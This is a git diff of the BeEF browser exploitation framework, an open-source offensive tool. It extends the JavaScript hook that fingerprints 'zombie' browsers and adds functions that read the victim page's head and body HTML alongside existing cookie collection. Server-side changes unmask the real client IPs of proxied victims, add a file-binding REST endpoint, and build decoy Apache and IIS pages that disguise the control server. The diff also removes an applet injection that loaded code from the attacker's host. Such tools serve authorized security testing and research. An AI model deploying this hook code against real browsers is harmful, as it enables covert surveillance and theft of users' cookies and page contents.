return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC:function () {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS();
},
/**
@@ -540,13 +716,29 @@ beef.browser = {
C17:this.isC17(), // Chrome 17
C18:this.isC18(), // Chrome 18
C19:this.isC19(), // Chrome 19
C19iOS:this.isC19iOS(), // Chrome 19 on iOS
C20:this.isC20(), // Chrome 20
C20iOS:this.isC20iOS(), // Chrome 20 on iOS
C21:this.isC21(), // Chrome 21
C21iOS:this.isC21iOS(), // Chrome 21 on iOS
C22:this.isC22(), // Chrome 22
C22iOS:this.isC22iOS(), // Chrome 22 on iOS
C23:this.isC23(), // Chrome 23
C23iOS:this.isC23iOS(), // Chrome 23 on iOS
C24:this.isC24(), // Chrome 24
C24iOS:this.isC24iOS(), // Chrome 24 on iOS
C25:this.isC25(), // Chrome 25
C25iOS:this.isC25iOS(), // Chrome 25 on iOS
C26:this.isC26(), // Chrome 26
C26iOS:this.isC26iOS(), // Chrome 26 on iOS
C27:this.isC27(), // Chrome 27
C27iOS:this.isC27iOS(), // Chrome 27 on iOS
C28:this.isC28(), // Chrome 28
C28iOS:this.isC28iOS(), // Chrome 28 on iOS
C29:this.isC29(), // Chrome 29
C29iOS:this.isC29iOS(), // Chrome 29 on iOS
C30:this.isC30(), // Chrome 30
C30iOS:this.isC30iOS(), // Chrome 30 on iOS
C:this.isC(), // Chrome any version
FF2:this.isFF2(), // Firefox 2
@@ -571,6 +763,10 @@ beef.browser = {
FF19:this.isFF19(), // Firefox 19
FF20:this.isFF20(), // Firefox 20
FF21:this.isFF21(), // Firefox 21
FF22:this.isFF22(), // Firefox 22
FF23:this.isFF23(), // Firefox 23
FF24:this.isFF24(), // Firefox 24
FF25:this.isFF25(), // Firefox 25
FF:this.isFF(), // Firefox any version
IE6:this.isIE6(), // Internet Explorer 6
@@ -662,34 +858,98 @@ beef.browser = {
return '19'
}
; // Chrome 19
if (this.isC19iOS()) {
return '19'
}
; // Chrome 19 for iOS
if (this.isC20()) {
return '20'
}
; // Chrome 20
if (this.isC20iOS()) {
return '20'
}
; // Chrome 20 for iOS
if (this.isC21()) {
return '21'
}
; // Chrome 21
if (this.isC21iOS()) {
return '21'
}
; // Chrome 21 for iOS
if (this.isC22()) {
return '22'
}
; // Chrome 22
if (this.isC22iOS()) {
return '22'
}
; // Chrome 22 for iOS
if (this.isC23()) {
return '23'
}
; // Chrome 23
if (this.isC23iOS()) {
return '23'
}
; // Chrome 23 for iOS
if (this.isC24()) {
return '24'
}
; // Chrome 24
if (this.isC24iOS()) {
return '24'
}
; // Chrome 24 for iOS
if (this.isC25()) {
return '25'
}
; // Chrome 25
if (this.isC25iOS()) {
return '25'
}
; // Chrome 25 for iOS
if (this.isC26()) {
return '26'
}
; // Chrome 26
if (this.isC26iOS()) {
return '26'
}
; // Chrome 26 for iOS
if (this.isC27()) {
return '27'
}
; // Chrome 27
if (this.isC27iOS()) {
return '27'
}
; // Chrome 27 for iOS
if (this.isC28()) {
return '28'
}
; // Chrome 28
if (this.isC28iOS()) {
return '28'
}
; // Chrome 28 for iOS
if (this.isC29()) {
return '29'
}
; // Chrome 29
if (this.isC29iOS()) {
return '29'
}
; // Chrome 29 for iOS
if (this.isC30()) {
return '30'
}
; // Chrome 30
if (this.isC30iOS()) {
return '30'
}
; // Chrome 30 for iOS
if (this.isFF2()) {
return '2'
}
@@ -778,6 +1038,22 @@ beef.browser = {
return '21'
}
; // Firefox 21
if (this.isFF22()) {
return '22'
}
; // Firefox 22
if (this.isFF23()) {
return '23'
}
; // Firefox 23
if (this.isFF24()) {
return '24'
}
; // Firefox 24
if (this.isFF25()) {
return '25'
}
; // Firefox 25
if (this.isIE6()) {
return '6'
@@ -887,7 +1163,7 @@ beef.browser = {
beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) {
// warn on cross-domain
beef.debug("Hooking frame failed");
beef.debug("Hooking child frame failed: "+e.message);
}
}
},
@@ -902,7 +1178,7 @@ beef.browser = {
if (!this.type().IE) {
return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
} else {
flash_versions = 11;
flash_versions = 12;
flash_installed = false;
if (window.ActiveXObject) {
@@ -914,10 +1190,10 @@ beef.browser = {
}
}
catch (e) {
beef.debug("Creating Flash ActiveX object failed: "+e.message);
}
}
}
;
return flash_installed;
}
},
@@ -943,7 +1219,7 @@ beef.browser = {
}
// Internet Explorer
// Internet Explorer
} else {
try {
@@ -951,6 +1227,7 @@ beef.browser = {
var qt_test = new ActiveXObject('QuickTime.QuickTime');
} catch (e) {
beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
}
if (qt_test) {
@@ -963,7 +1240,7 @@ beef.browser = {
},
/**
/**
* Checks if the zombie has the RealPlayer plugin installed.
* @return: {Boolean} true or false.
*
@@ -984,30 +1261,30 @@ beef.browser = {
}
// Internet Explorer
// Internet Explorer
} else {
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
for (var i = 0; i < definedControls.length; i++) {
for (var i = 0; i < definedControls.length; i++) {
try {
var rp_test = new ActiveXObject(definedControls[i]);
var rp_test = new ActiveXObject(definedControls[i]);
} catch (e) {
beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
}
if ( rp_test ) {
realplayer = true;
}
}
if ( rp_test ) {
realplayer = true;
}
}
}
return realplayer;
@@ -1043,6 +1320,7 @@ beef.browser = {
var wmp_test = new ActiveXObject('WMPlayer.OCX');
} catch (e) {
beef.debug("Creating WMP ActiveX object failed: "+e.message);
}
if (wmp_test) {
@@ -1071,10 +1349,11 @@ beef.browser = {
try {
control = new ActiveXObject("VideoLAN.VLCPlugin.2");
vlc = true ;
} catch(e) {
}
};
return vlc ;
} catch(e) {
beef.debug("Creating VLC ActiveX object failed: "+e.message);
}
}
return vlc;
},
/**
@@ -1084,7 +1363,14 @@ beef.browser = {
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled:function () {
return false;
//Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
// versionJRE = deployJava.getJREs();
// if(versionJRE != '')
// return true;
// else
return false;
},
/**
@@ -1128,33 +1414,8 @@ beef.browser = {
*/
hasJava:function () {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
return beef.browser.javaEnabled();
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava',
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch (e) {
return false;
}
},
/**
@@ -1483,7 +1744,6 @@ beef.browser = {
});
var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
@@ -1495,7 +1755,6 @@ beef.browser = {
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
try{
var cookies = document.cookie;
@@ -1530,7 +1789,6 @@ beef.browser = {
if (browser_type) details['BrowserType'] = browser_type;
if (screen_size) details['ScreenSize'] = screen_size;
if (window_size) details['WindowSize'] = window_size;
if (java_enabled) details['JavaEnabled'] = java_enabled;
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
if (has_flash) details['HasFlash'] = has_flash;
if (has_phonegap) details['HasPhonegap'] = has_phonegap;
@@ -1542,7 +1800,6 @@ beef.browser = {
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_wmp) details['HasWMP'] = has_wmp;
if (has_vlc) details['HasVLC'] = has_vlc;
if (has_foxit) details['HasFoxit'] = has_foxit;
return details;
@@ -1691,6 +1948,30 @@ beef.browser = {
return foxitplugin;
},
/**
* Returns the page head HTML
**/
getPageHead:function () {
var html_head;
try {
html_head = document.head.innerHTML.toString();
} catch (e) {
}
return html_head;
},
/**
* Returns the page body HTML
**/
getPageBody:function() {
var html_body;
try {
html_body = document.body.innerHTML.toString();
} catch (e) {
}
return html_body;
},
/**
* Dynamically changes the favicon: works in Firefox, Chrome and Opera
**/

3
core/main/client/dom.js
View File

@@ -384,7 +384,8 @@ beef.dom = {
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}else{
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {

1301
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

2
core/main/console/banners.rb
View File

@@ -86,7 +86,7 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
print_more data
end

4
core/main/constants/hardware.rb
View File

@@ -34,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_GOOGLE_UA_STR = 'Nexus'
HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'

67
core/main/handlers/browserdetails.rb
View File

@@ -68,6 +68,7 @@ module BeEF
}
zombie.httpheaders = @http_headers.to_json
zombie.save
#puts "HTTP Headers: #{zombie.httpheaders}"
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
self.err_msg "Invalid browser name returned from the hook browser's initial connection."
end
# detect browser proxy
using_proxy = false
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'PROXY_CONNECTION',
'PROXY_AUTHENTICATE',
'X_FORWARDED',
'X_FORWARDED_FOR',
'VIA'
].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true
break
end
end
# retrieve proxy client IP
proxy_clients = []
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'X_FORWARDED',
'X_FORWARDED_FOR'
].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end
# retrieve proxy server
proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
# store and log proxy details
if using_proxy == true
BD.set(session_id, 'UsingProxy', "#{using_proxy}")
proxy_log_string = "#{zombie.ip} is using a proxy"
unless proxy_clients.nil?
BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
end
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
# get and store browser version
browser_version = get_param(@data['results'], 'BrowserVersion')
if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -199,14 +250,6 @@ module BeEF
self.err_msg "Invalid window size returned from the hook browser's initial connection."
end
# get and store the yes|no value for JavaEnabled
java_enabled = get_param(@data['results'], 'JavaEnabled')
if BeEF::Filters.is_valid_yes_no?(java_enabled)
BD.set(session_id, 'JavaEnabled', java_enabled)
else
self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for VBScriptEnabled
vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
if BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -303,14 +346,6 @@ module BeEF
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?

2
core/main/models/browserdetails.rb
View File

@@ -80,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end

7
core/main/rest/api.rb
View File

@@ -37,12 +37,19 @@ module BeEF
end
end
module RegisterServerHandler
def self.mount_handler(server)
server.mount('/api/server', BeEF::Core::Rest::Server.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

41
core/main/rest/handlers/server.rb Normal file
View File

@@ -0,0 +1,41 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
rescue Exception => e
error 400
end
end
end
end
end
end

5
core/main/router/router.rb
View File

@@ -114,6 +114,7 @@ module BeEF
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
bp = config.get "beef.http.web_ui_basepath"
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
@@ -209,7 +210,7 @@ module BeEF
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
@@ -234,7 +235,7 @@ module BeEF
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +

3
core/main/server.rb
View File

@@ -22,9 +22,10 @@ module BeEF
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
@url = "http://#{beef_host}:#{beef_port}"
@url = "#{beef_proto}://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@command_urls = {}
@mounts = {}

70
extensions/admin_ui/api/handler.rb
View File

@@ -12,40 +12,90 @@ module API
# We use this module to register all the http handler for the Administrator UI
#
module Handler
require 'uglifier'
BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
def self.evaluate_and_minify(content, params, name)
erubis = Erubis::FastEruby.new(content)
evaluated = erubis.evaluate(params)
minified = Uglifier.compile(evaluated)
write_to = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{name}.js", "w+")
File.open(write_to, 'w') { |file| file.write(minified) }
File.path write_to
end
def self.build_javascript_ui(beef_server)
auth_js_file = File.read(File.dirname(__FILE__)+'/../media/javascript/ui/authentication.js') + "\n\n"
js_files = ""
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js)
global_js = esapi + ux + panel
global_js.each do |file|
js_files << File.read(File.dirname(__FILE__)+'/../media/javascript/'+file) + "\n\n"
end
config = BeEF::Core::Configuration.instance
bp = config.get "beef.http.web_ui_basepath"
# if more dynamic variables are needed in JavaScript files
# add them here in the following Hash
params = {
'base_path' => bp
}
# process all JavaScript files, evaluating them with Erubis
web_ui_all = self.evaluate_and_minify(js_files, params, 'web_ui_all')
web_ui_auth = self.evaluate_and_minify(auth_js_file, params, 'web_ui_auth')
beef_server.mount("#{bp}/web_ui_all.js", Rack::File.new(web_ui_all))
beef_server.mount("#{bp}/web_ui_auth.js", Rack::File.new(web_ui_auth))
end
#
# This function gets called automatically by the server.
#
def self.mount_handler(beef_server)
# retrieve the configuration class instance
configuration = BeEF::Core::Configuration.instance
config = BeEF::Core::Configuration.instance
# Web UI base path, like http://beef_domain/<bp>/panel
bp = config.get "beef.http.web_ui_basepath"
# registers the http controllers used by BeEF core (authentication, logs, modules and panel)
Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
require http_module
mod_name = File.basename http_module, '.rb'
beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
end
# registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
require http_module
mod_name = File.basename http_module, '.rb'
beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
end
# mount the folder were we store static files (javascript, css, images) for the admin ui
media_dir = File.dirname(__FILE__)+'/../media/'
beef_server.mount('/ui/media', Rack::File.new(media_dir))
beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
# mount the favicon file, if we're not imitating a web server.
if !configuration.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
if !config.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
end
self.build_javascript_ui beef_server
end
end

26
extensions/admin_ui/classes/httpcontroller.rb
View File

@@ -40,8 +40,12 @@ module AdminUI
def run(request, response)
@request = request
@params = request.params
@session = BeEF::Extension::AdminUI::Session.instance
auth_url = '/ui/authentication'
@session = BeEF::Extension::AdminUI::Session.instance
config = BeEF::Core::Configuration.instance
# Web UI base path, like http://beef_domain/<bp>/panel
@bp = config.get "beef.http.web_ui_basepath"
auth_url = "#{@bp}/authentication"
# test if session is unauth'd and whether the auth functionality is requested
if not @session.valid_session?(@request) and not self.class.eql?(BeEF::Extension::AdminUI::Controllers::Authentication)
@@ -78,14 +82,14 @@ module AdminUI
end
# Constructs a redirect script
def script_redirect(location) "<script> document.location=\"#{location}\"</script>" end
# Constructs a html script tag
def script_tag(filename) "<script src=\"#{$url}/ui/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html script tag (from media/javascript directory)
def script_tag(filename) "<script src=\"#{$url}#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html script tag (from media/javascript-min directory)
def script_tag_min(filename) "<script src=\"#{$url}#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>" end
# Constructs a html stylesheet tag
def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}/ui/media/css/#{filename}\" type=\"text/css\" />" end
def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}#{@bp}/media/css/#{filename}\" type=\"text/css\" />" end
# Constructs a hidden html nonce tag
def nonce_tag
@@ -93,6 +97,10 @@ module AdminUI
"<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"" + @session.get_nonce + "\"/>"
end
def base_path
"#{@bp}"
end
private
@eruby

4
extensions/admin_ui/controllers/authentication/index.html
View File

@@ -9,7 +9,7 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag 'ui/authentication.js' %>
<%= script_tag_min 'web_ui_auth.js' %>
<%= stylesheet_tag 'ext-all.css' %>
@@ -31,6 +31,6 @@
</head>
<body>
<div id="centered"><img id="beef-logo" src="/ui/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
</body>
</html>

43
extensions/admin_ui/controllers/panel/index.html
View File

@@ -12,47 +12,8 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag 'ext-beef.js' %>
<!-- jQuery encoder (ESAPI way) -->
<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
<%= script_tag 'esapi/Class.create.js' %>
<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
<!-- BeEF Web UI common functions-->
<%= script_tag 'ui/common/beef_common.js' %>
<%= script_tag 'ux/TabCloseMenu.js' %>
<%= script_tag 'ux/StatusBar.js' %>
<%= script_tag 'ux/PagingStore.js' %>
<%= script_tag 'ui/panel/common.js' %>
<%= script_tag 'ui/panel/DistributedEngine.js' %>
<%= script_tag 'ui/panel/PanelStatusBar.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabDetails.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabLogs.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabCommands.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
<%= script_tag 'wterm/wterm.jquery.js' %>
<%= script_tag_min 'web_ui_all.js' %>
<%= stylesheet_tag 'wterm.css' %>
<script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
<%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
<%= script_tag 'ui/panel/PanelViewer.js' %>
<%= script_tag 'ui/panel/DataGrid.js' %>
<%= script_tag 'ui/panel/MainPanel.js' %>
<%= script_tag 'ui/panel/ZombieTab.js' %>
<%= script_tag 'ui/panel/ZombieTabs.js' %>
<%= script_tag 'ui/panel/zombiesTreeList.js' %>
<%= script_tag 'ui/panel/ZombiesMgr.js' %>
<%= script_tag 'ui/panel/Logout.js' %>
<%= script_tag 'ui/panel/WelcomeTab.js' %>
<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
<%= stylesheet_tag 'ext-all.css' %>
<%= stylesheet_tag 'base.css' %>
</head>
@@ -63,7 +24,7 @@
<div class="left-menu" id="header-right">
</div>
<div class="right-menu">
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

4
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -87,14 +87,12 @@ module BeEF
